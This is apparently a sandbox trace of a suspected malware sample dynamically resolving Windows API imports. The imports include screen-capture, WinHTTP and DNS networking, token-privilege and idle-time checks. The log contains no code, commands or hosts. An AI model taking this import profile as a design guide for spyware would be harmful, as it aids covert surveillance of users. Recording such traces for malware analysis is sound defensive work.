[0089.587] GetProcAddress (hModule=0x76600000, lpProcName="DeleteTimerQueueTimer") returned 0x7662f7d3 [0089.587] GetProcAddress (hModule=0x76600000, lpProcName="CreateTimerQueueTimer") returned 0x7662f7eb [0089.587] GetProcAddress (hModule=0x76600000, lpProcName="CreateNamedPipeA") returned 0x76691807 [0089.587] GetProcAddress (hModule=0x76600000, lpProcName="ConnectNamedPipe") returned 0x766940fb [0089.587] GetProcAddress (hModule=0x76600000, lpProcName="CreateDirectoryW") returned 0x76614259 [0089.587] GetProcAddress (hModule=0x76600000, lpProcName="GetExitCodeProcess") returned 0x7662174d [0089.587] GetProcAddress (hModule=0x76600000, lpProcName="GlobalFree") returned 0x76615558 [0089.587] GetProcAddress (hModule=0x76600000, lpProcName="GetLocaleInfoA") returned 0x7662d5e5 [0089.587] GetProcAddress (hModule=0x76600000, lpProcName="GetSystemTime") returned 0x76615a96 [0089.587] GetProcAddress (hModule=0x76600000, lpProcName="GlobalMemoryStatusEx") returned 0x7663d4c4 [0089.587] GetProcAddress (hModule=0x76600000, lpProcName="MultiByteToWideChar") returned 0x7661192e [0089.587] GetProcAddress (hModule=0x76600000, lpProcName="VerSetConditionMask") returned 0x76fe92b9 [0089.587] GetProcAddress (hModule=0x76600000, lpProcName="VerifyVersionInfoA") returned 0x7662f803 [0089.587] GetProcAddress (hModule=0x76600000, lpProcName="GetModuleHandleA") returned 0x76611245 [0089.587] GetProcAddress (hModule=0x76600000, lpProcName="lstrlenA") returned 0x76615a4b [0089.587] GetProcAddress (hModule=0x76600000, lpProcName="GetVolumeInformationW") returned 0x7662c860 [0089.587] GetProcAddress (hModule=0x76600000, lpProcName="GetFileInformationByHandle") returned 0x766153ae [0089.587] GetProcAddress (hModule=0x76600000, lpProcName="HeapAlloc") returned 0x76f9e026 [0089.588] GetProcAddress (hModule=0x76600000, lpProcName="HeapFree") returned 0x766114c9 [0089.588] GetProcAddress (hModule=0x76600000, lpProcName="GetProcessHeap") returned 0x766114e9 [0089.588] GetProcAddress (hModule=0x76600000, lpProcName="SetUnhandledExceptionFilter") returned 0x766187c9 [0089.588] GetProcAddress (hModule=0x76600000, lpProcName="UnhandledExceptionFilter") returned 0x7663772f [0089.588] GetProcAddress (hModule=0x76600000, lpProcName="RtlUnwind") returned 0x7663d1c3 [0089.588] GetProcAddress (hModule=0x76600000, lpProcName="InterlockedCompareExchange") returned 0x76611484 [0089.588] GetProcAddress (hModule=0x76600000, lpProcName="InterlockedExchange") returned 0x76611462 [0089.588] GetProcAddress (hModule=0x76600000, lpProcName="GetEnvironmentVariableA") returned 0x766133a0 [0089.588] GetProcAddress (hModule=0x76600000, lpProcName="LoadLibraryA") returned 0x766149d7 [0089.588] GetProcAddress (hModule=0x76600000, lpProcName="FreeLibrary") returned 0x766134c8 [0089.588] GetProcAddress (hModule=0x76600000, lpProcName="DeleteFileW") returned 0x766189b3 [0089.588] GetProcAddress (hModule=0x76600000, lpProcName="GetFileAttributesW") returned 0x76611b18 [0089.588] GetProcAddress (hModule=0x76600000, lpProcName="WriteFile") returned 0x76611282 [0089.588] GetProcAddress (hModule=0x76600000, lpProcName="ExitThread") returned 0x76fcd598 [0089.588] GetProcAddress (hModule=0x76600000, lpProcName="SetFilePointer") returned 0x766117d1 [0089.588] GetProcAddress (hModule=0x76600000, lpProcName="OpenProcess") returned 0x76611986 [0089.588] GetProcAddress (hModule=0x76600000, lpProcName="GetModuleHandleW") returned 0x766134b0 [0089.588] GetProcAddress (hModule=0x76600000, lpProcName="GetCurrentProcessId") returned 0x766111f8 [0089.588] GetProcAddress (hModule=0x76600000, lpProcName="GetLocalTime") returned 0x76615aa6 [0089.589] GetProcAddress (hModule=0x76600000, lpProcName="GetLastError") returned 0x766111c0 [0089.589] GetProcAddress (hModule=0x76600000, lpProcName="GetSystemInfo") returned 0x766149ca [0089.589] GetProcAddress (hModule=0x76600000, lpProcName="ExitProcess") returned 0x76617a10 [0089.589] GetProcAddress (hModule=0x76600000, lpProcName="ResetEvent") returned 0x766116dd [0089.589] GetProcAddress (hModule=0x76600000, lpProcName="LeaveCriticalSection") returned 0x76f92270 [0089.589] GetProcAddress (hModule=0x76600000, lpProcName="EnterCriticalSection") returned 0x76f922b0 [0089.589] GetProcAddress (hModule=0x76600000, lpProcName="DeleteCriticalSection") returned 0x76fa45f5 [0089.589] GetProcAddress (hModule=0x76600000, lpProcName="InitializeCriticalSection") returned 0x76fa2c42 [0089.589] GetProcAddress (hModule=0x76600000, lpProcName="SetEvent") returned 0x766116c5 [0089.589] GetProcAddress (hModule=0x76600000, lpProcName="CreateEventW") returned 0x7661183e [0089.589] GetProcAddress (hModule=0x76600000, lpProcName="GetCurrentThreadId") returned 0x76611450 [0089.589] GetProcAddress (hModule=0x76600000, lpProcName="GetSystemTimeAsFileTime") returned 0x76613509 [0089.589] GetProcAddress (hModule=0x76600000, lpProcName="SystemTimeToFileTime") returned 0x76615a7e [0089.589] GetProcAddress (hModule=0x76600000, lpProcName="TerminateThread") returned 0x76617a2f [0089.589] GetProcAddress (hModule=0x76600000, lpProcName="WaitForSingleObject") returned 0x76611136 [0089.589] GetProcAddress (hModule=0x76600000, lpProcName="CreateThread") returned 0x766134d5 [0089.589] GetProcAddress (hModule=0x76600000, lpProcName="OutputDebugStringA") returned 0x7663b2b7 [0089.589] GetProcAddress (hModule=0x76600000, lpProcName="CloseHandle") returned 0x76611410 [0089.589] GetProcAddress (hModule=0x76600000, lpProcName="GetTickCount") returned 0x7661110c [0089.590] GetProcAddress (hModule=0x76600000, lpProcName="ReadFile") returned 0x76613ed3 [0089.590] GetProcAddress (hModule=0x76600000, lpProcName="GetFileSize") returned 0x7661196e [0089.590] GetProcAddress (hModule=0x76600000, lpProcName="GetQueuedCompletionStatus") returned 0x7662d3c3 [0089.590] GetProcAddress (hModule=0x76600000, lpProcName="CreateFileW") returned 0x76613f5c [0089.590] GetProcAddress (hModule=0x76600000, lpProcName="QueryPerformanceCounter") returned 0x76611725 [0089.590] GetProcAddress (hModule=0x76600000, lpProcName="WideCharToMultiByte") returned 0x7661170d [0089.590] GetProcAddress (hModule=0x76600000, lpProcName="LoadLibraryW") returned 0x7661492b [0089.590] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74ca0000 [0089.590] GetProcAddress (hModule=0x74ca0000, lpProcName="GetIconInfo") returned 0x74cc49ea [0089.590] GetProcAddress (hModule=0x74ca0000, lpProcName="GetCursorPos") returned 0x74cc1218 [0089.590] GetProcAddress (hModule=0x74ca0000, lpProcName="DrawIcon") returned 0x74cc8deb [0089.590] GetProcAddress (hModule=0x74ca0000, lpProcName="ReleaseDC") returned 0x74cb7446 [0089.590] GetProcAddress (hModule=0x74ca0000, lpProcName="GetDesktopWindow") returned 0x74cc0a19 [0089.590] GetProcAddress (hModule=0x74ca0000, lpProcName="GetDC") returned 0x74cb72c4 [0089.590] GetProcAddress (hModule=0x74ca0000, lpProcName="GetSystemMetrics") returned 0x74cb7d2f [0089.590] GetProcAddress (hModule=0x74ca0000, lpProcName="GetLastInputInfo") returned 0x74ccb382 [0089.590] GetProcAddress (hModule=0x74ca0000, lpProcName="CharLowerA") returned 0x74cc3e75 [0089.590] GetProcAddress (hModule=0x74ca0000, lpProcName="GetWindowRect") returned 0x74cb7f34 [0089.590] GetProcAddress (hModule=0x74ca0000, lpProcName="GetMessageW") returned 0x74cb78e2 [0089.591] GetProcAddress (hModule=0x74ca0000, lpProcName="PostMessageW") returned 0x74cc12a5 [0089.591] GetProcAddress (hModule=0x74ca0000, lpProcName="MessageBoxA") returned 0x74d0fd1e [0089.591] GetProcAddress (hModule=0x74ca0000, lpProcName="MessageBoxW") returned 0x74d0fd3f [0089.591] GetProcAddress (hModule=0x74ca0000, lpProcName="LoadImageA") returned 0x74cc8455 [0089.591] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x760d0000 [0089.594] GetProcAddress (hModule=0x760d0000, lpProcName="CryptImportPublicKeyInfo") returned 0x760e6c0e [0089.594] GetProcAddress (hModule=0x760d0000, lpProcName="CryptStringToBinaryA") returned 0x76105d77 [0089.594] GetProcAddress (hModule=0x760d0000, lpProcName="CryptDecodeObjectEx") returned 0x760dd718 [0089.594] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x762f0000 [0089.597] GetProcAddress (hModule=0x762f0000, lpProcName=0xb) returned 0x762f311b [0089.597] GetProcAddress (hModule=0x762f0000, lpProcName=0x9) returned 0x762f2d8b [0089.597] GetProcAddress (hModule=0x762f0000, lpProcName="WSASocketW") returned 0x762f3cd3 [0089.597] GetProcAddress (hModule=0x762f0000, lpProcName="WSASendTo") returned 0x7630b30c [0089.597] GetProcAddress (hModule=0x762f0000, lpProcName=0x6f) returned 0x762f37ad [0089.597] GetProcAddress (hModule=0x762f0000, lpProcName=0x3) returned 0x762f3918 [0089.597] GetProcAddress (hModule=0x762f0000, lpProcName="WSARecvFrom") returned 0x762fcba6 [0089.597] GetProcAddress (hModule=0x762f0000, lpProcName="WSAIoctl") returned 0x762f2fe7 [0089.597] GetProcAddress (hModule=0x762f0000, lpProcName=0x15) returned 0x762f41b6 [0089.598] GetProcAddress (hModule=0x762f0000, lpProcName=0x2) returned 0x762f4582 [0089.598] GetProcAddress (hModule=0x762f0000, lpProcName=0xc) returned 0x762fb131 [0089.598] GetProcAddress (hModule=0x762f0000, lpProcName="WSASend") returned 0x762f4406 [0089.598] GetProcAddress (hModule=0x762f0000, lpProcName=0x5) returned 0x762f7147 [0089.598] GetProcAddress (hModule=0x762f0000, lpProcName=0x73) returned 0x762f3ab2 [0089.598] GetProcAddress (hModule=0x762f0000, lpProcName="WSARecv") returned 0x762f7089 [0089.598] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x743a0000 [0089.600] GetProcAddress (hModule=0x743a0000, lpProcName="DnsWriteQuestionToBuffer_UTF8") returned 0x743cadbb [0089.600] GetProcAddress (hModule=0x743a0000, lpProcName="DnsExtractRecordsFromMessage_UTF8") returned 0x743caf44 [0089.600] GetProcAddress (hModule=0x743a0000, lpProcName="DnsFree") returned 0x743a436b [0089.600] LoadLibraryA (lpLibFileName="PSAPI.DLL") returned 0x74c90000 [0089.601] GetProcAddress (hModule=0x74c90000, lpProcName="GetModuleBaseNameA") returned 0x74c915a4 [0089.601] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76710000 [0089.602] GetProcAddress (hModule=0x76710000, lpProcName="CoCreateGuid") returned 0x767515d5 [0089.602] GetProcAddress (hModule=0x76710000, lpProcName="CoInitializeEx") returned 0x767509ad [0089.602] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74ea0000 [0089.602] GetProcAddress (hModule=0x74ea0000, lpProcName="CryptGetHashParam") returned 0x74eadf7e [0089.602] GetProcAddress (hModule=0x74ea0000, lpProcName="CryptReleaseContext") returned 0x74eae124 [0089.602] GetProcAddress (hModule=0x74ea0000, lpProcName="CryptAcquireContextW") returned 0x74eadf14 [0089.602] GetProcAddress (hModule=0x74ea0000, lpProcName="CryptCreateHash") returned 0x74eadf4e [0089.602] GetProcAddress (hModule=0x74ea0000, lpProcName="CryptHashData") returned 0x74eadf36 [0089.602] GetProcAddress (hModule=0x74ea0000, lpProcName="GetUserNameW") returned 0x74eb157a [0089.602] GetProcAddress (hModule=0x74ea0000, lpProcName="InitializeSecurityDescriptor") returned 0x74eb4620 [0089.602] GetProcAddress (hModule=0x74ea0000, lpProcName="SetSecurityDescriptorDacl") returned 0x74eb415e [0089.602] GetProcAddress (hModule=0x74ea0000, lpProcName="CryptVerifySignatureW") returned 0x74eac54a [0089.602] GetProcAddress (hModule=0x74ea0000, lpProcName="CryptDestroyKey") returned 0x74eac51a [0089.602] GetProcAddress (hModule=0x74ea0000, lpProcName="RegOpenKeyExA") returned 0x74eb4907 [0089.603] GetProcAddress (hModule=0x74ea0000, lpProcName="RegQueryValueExA") returned 0x74eb48ef [0089.603] GetProcAddress (hModule=0x74ea0000, lpProcName="RegCloseKey") returned 0x74eb469d [0089.603] GetProcAddress (hModule=0x74ea0000, lpProcName="OpenProcessToken") returned 0x74eb4304 [0089.603] GetProcAddress (hModule=0x74ea0000, lpProcName="GetTokenInformation") returned 0x74eb431c [0089.603] GetProcAddress (hModule=0x74ea0000, lpProcName="GetSidSubAuthorityCount") returned 0x74eb0e0c [0089.603] GetProcAddress (hModule=0x74ea0000, lpProcName="GetSidSubAuthority") returned 0x74eb0e24 [0089.603] GetProcAddress (hModule=0x74ea0000, lpProcName="AllocateAndInitializeSid") returned 0x74eb40e6 [0089.603] GetProcAddress (hModule=0x74ea0000, lpProcName="CheckTokenMembership") returned 0x74eadf04 [0089.603] GetProcAddress (hModule=0x74ea0000, lpProcName="FreeSid") returned 0x74eb412e [0089.603] GetProcAddress (hModule=0x74ea0000, lpProcName="CryptDestroyHash") returned 0x74eadf66 [0089.603] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x74f40000 [0089.606] GetProcAddress (hModule=0x74f40000, lpProcName="CommandLineToArgvW") returned 0x74f59ee8 [0089.606] GetProcAddress (hModule=0x74f40000, lpProcName="ShellExecuteExW") returned 0x74f61e46 [0089.606] GetProcAddress (hModule=0x74f40000, lpProcName="SHGetFolderPathW") returned 0x74fc5708 [0089.606] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76070000 [0089.606] GetProcAddress (hModule=0x76070000, lpProcName="PathIsDirectoryW") returned 0x7607ff07 [0089.607] GetProcAddress (hModule=0x76070000, lpProcName=0xc) returned 0x7608158a [0089.607] GetProcAddress (hModule=0x76070000, lpProcName="PathAppendW") returned 0x760881ef [0089.607] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x74340000 [0089.611] GetProcAddress (hModule=0x74340000, lpProcName="WinHttpGetIEProxyConfigForCurrentUser") returned 0x7435257e [0089.611] GetProcAddress (hModule=0x74340000, lpProcName="WinHttpAddRequestHeaders") returned 0x74359dfb [0089.611] GetProcAddress (hModule=0x74340000, lpProcName="WinHttpOpen") returned 0x743458b9 [0089.611] GetProcAddress (hModule=0x74340000, lpProcName="WinHttpCloseHandle") returned 0x74342c01 [0089.611] GetProcAddress (hModule=0x74340000, lpProcName="WinHttpConnect") returned 0x7434d9f5 [0089.611] GetProcAddress (hModule=0x74340000, lpProcName="WinHttpOpenRequest") returned 0x74344aea [0089.611] GetProcAddress (hModule=0x74340000, lpProcName="WinHttpSetOption") returned 0x74343f6c [0089.611] GetProcAddress (hModule=0x74340000, lpProcName="WinHttpSendRequest") returned 0x743479bd [0089.611] GetProcAddress (hModule=0x74340000, lpProcName="WinHttpReceiveResponse") returned 0x7434b262 [0089.612] GetProcAddress (hModule=0x74340000, lpProcName="WinHttpWriteData") returned 0x7435abfd [0089.612] GetProcAddress (hModule=0x74340000, lpProcName="WinHttpQueryHeaders") returned 0x7434ba51 [0089.612] GetProcAddress (hModule=0x74340000, lpProcName="WinHttpQueryDataAvailable") returned 0x7435c5dd [0089.612] GetProcAddress (hModule=0x74340000, lpProcName="WinHttpReadData") returned 0x7434cb9e [0089.612] GetProcAddress (hModule=0x74340000, lpProcName="WinHttpSetStatusCallback") returned 0x74345ebd [0089.612] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x763f0000 [0089.612] GetProcAddress (hModule=0x763f0000, lpProcName="CreateCompatibleDC") returned 0x764054f4 [0089.612] GetProcAddress (hModule=0x763f0000, lpProcName="SelectObject") returned 0x76404f70 [0089.612] GetProcAddress (hModule=0x763f0000, lpProcName="BitBlt") returned 0x76405ea6 [0089.612] GetProcAddress (hModule=0x763f0000, lpProcName="DeleteDC") returned 0x764058b3 [0089.612] GetProcAddress (hModule=0x763f0000, lpProcName="DeleteObject") returned 0x76405689 [0089.612] GetProcAddress (hModule=0x763f0000, lpProcName="GetDeviceCaps") returned 0x76404de0 [0089.612] GetProcAddress (hModule=0x763f0000, lpProcName="CreateCompatibleBitmap") returned 0x76405f49 [0089.612] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x76f70000 [0089.612] GetProcAddress (hModule=0x76f70000, lpProcName="RtlRandom") returned 0x770398c3 [0089.612] GetProcAddress (hModule=0x76f70000, lpProcName="ZwQueryObject") returned 0x76f8f9e8 [0089.613] GetProcAddress (hModule=0x76f70000, lpProcName="RtlImageNtHeader") returned 0x76fa3164 [0089.613] GetProcAddress (hModule=0x76f70000, lpProcName="ZwQuerySystemInformation") returned 0x76f8fda0 [0089.613] GetProcAddress (hModule=0x76f70000, lpProcName="NtQuerySystemInformation") returned 0x76f8fda0 [0089.613] LoadLibraryA (lpLibFileName="gdiplus.dll") returned 0x74160000 [0089.614] GetProcAddress (hModule=0x74160000, lpProcName="GdiplusStartup") returned 0x74185600 [0089.614] GetProcAddress (hModule=0x74160000, lpProcName="GdiplusShutdown") returned 0x741856be [0089.615] GetProcAddress (hModule=0x74160000, lpProcName="GdipAlloc") returned 0x741a2437 [0089.615] GetProcAddress (hModule=0x74160000, lpProcName="GdipCreateBitmapFromHBITMAP") returned 0x74196671 [0089.615] GetProcAddress (hModule=0x74160000, lpProcName="GdipGetImageEncodersSize") returned 0x741a2203 [0089.615] GetProcAddress (hModule=0x74160000, lpProcName="GdipGetImageEncoders") returned 0x741a228c [0089.615] GetProcAddress (hModule=0x74160000, lpProcName="GdipSaveImageToStream") returned 0x74194153 [0089.615] GetProcAddress (hModule=0x74160000, lpProcName="GdipDisposeImage") returned 0x74194cc8 [0089.615] GetProcAddress (hModule=0x74160000, lpProcName="GdipFree") returned 0x741a24b2 [0089.615] GetProcAddress (hModule=0x74160000, lpProcName="GdipCloneImage") returned 0x74194bfa [0089.615] LoadLibraryA (lpLibFileName="NETAPI32.dll") returned 0x74140000 [0089.621] GetProcAddress (hModule=0x74140000, lpProcName="NetApiBufferFree") returned 0x745b13d2 [0089.621] GetProcAddress (hModule=0x74140000, lpProcName="NetWkstaGetInfo") returned 0x74145570 [0089.621] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x76a40000 [0089.621] GetProcAddress (hModule=0x76a40000, lpProcName="malloc") returned 0x76a49cee [0089.621] GetProcAddress (hModule=0x76a40000, lpProcName="vsprintf") returned 0x76ab7677 [0089.621] GetProcAddress (hModule=0x76a40000, lpProcName="free") returned 0x76a49894 [0089.621] GetProcAddress (hModule=0x76a40000, lpProcName="??3@YAXPAX@Z") returned 0x76a4b0b9 [0089.621] GetProcAddress (hModule=0x76a40000, lpProcName="??2@YAPAXI@Z") returned 0x76a4b0c9 [0089.621] GetProcAddress (hModule=0x76a40000, lpProcName="memcpy") returned 0x76a49910 [0089.621] GetProcAddress (hModule=0x76a40000, lpProcName="memmove") returned 0x76a49e5a [0089.621] GetProcAddress (hModule=0x76a40000, lpProcName="puts") returned 0x76ab8d04 [0089.622] GetProcAddress (hModule=0x76a40000, lpProcName="abort") returned 0x76aa8e53 [0089.622] GetProcAddress (hModule=0x76a40000, lpProcName="memset") returned 0x76a49790 [0089.622] GetProcAddress (hModule=0x76a40000, lpProcName="strlen") returned 0x76a543d3 [0089.622] GetProcAddress (hModule=0x76a40000, lpProcName="wcslen") returned 0x76a5d335 [0089.622] GetProcAddress (hModule=0x76a40000, lpProcName="exit") returned 0x76a536aa [0089.622] GetProcAddress (hModule=0x76a40000, lpProcName="realloc") returned 0x76a4b10d [0089.622] GetProcAddress (hModule=0x76a40000, lpProcName="strncmp") returned 0x76a4b443 [0089.622] GetProcAddress (hModule=0x76a40000, lpProcName="_strcmpi") returned 0x76a4db38 [0089.622] GetProcAddress (hModule=0x76a40000, lpProcName="_vsnwprintf") returned 0x76a4bbce [0089.622] GetProcAddress (hModule=0x76a40000, lpProcName="_purecall") returned 0x76aa6ea9 [0089.622] GetProcAddress (hModule=0x76a40000, lpProcName="tolower") returned 0x76a4c4f0 [0089.622] GetProcAddress (hModule=0x76a40000, lpProcName="atoi") returned 0x76a4dbe0 [0089.622] GetProcAddress (hModule=0x76a40000, lpProcName="strcmp") returned 0x76a58b11 [0089.623] GetProcAddress (hModule=0x76a40000, lpProcName="atol") returned 0x76a4ddf4 [0089.623] GetProcAddress (hModule=0x76a40000, lpProcName="_wcsicmp") returned 0x76a4a9e9 [0089.623] GetProcAddress (hModule=0x76a40000, lpProcName="_snwprintf") returned 0x76a695d1 [0089.623] GetProcAddress (hModule=0x76a40000, lpProcName="wcscmp") returned 0x76a5d3b7 [0089.623] GetProcAddress (hModule=0x76a40000, lpProcName="wcsrchr") returned 0x76a4a73f [0089.623] GetProcAddress (hModule=0x76a40000, lpProcName="wcscpy") returned 0x76a5d4f8 [0089.623] GetProcAddress (hModule=0x76a40000, lpProcName="_errno") returned 0x76a4a5b8 [0089.623] GetProcAddress (hModule=0x76a40000, lpProcName="wcschr") returned 0x76a4aa61 [0089.623] GetProcAddress (hModule=0x76a40000, lpProcName="strchr") returned 0x76a4dbeb [0089.623] GetProcAddress (hModule=0x76a40000, lpProcName="_iob") returned 0x76ae2900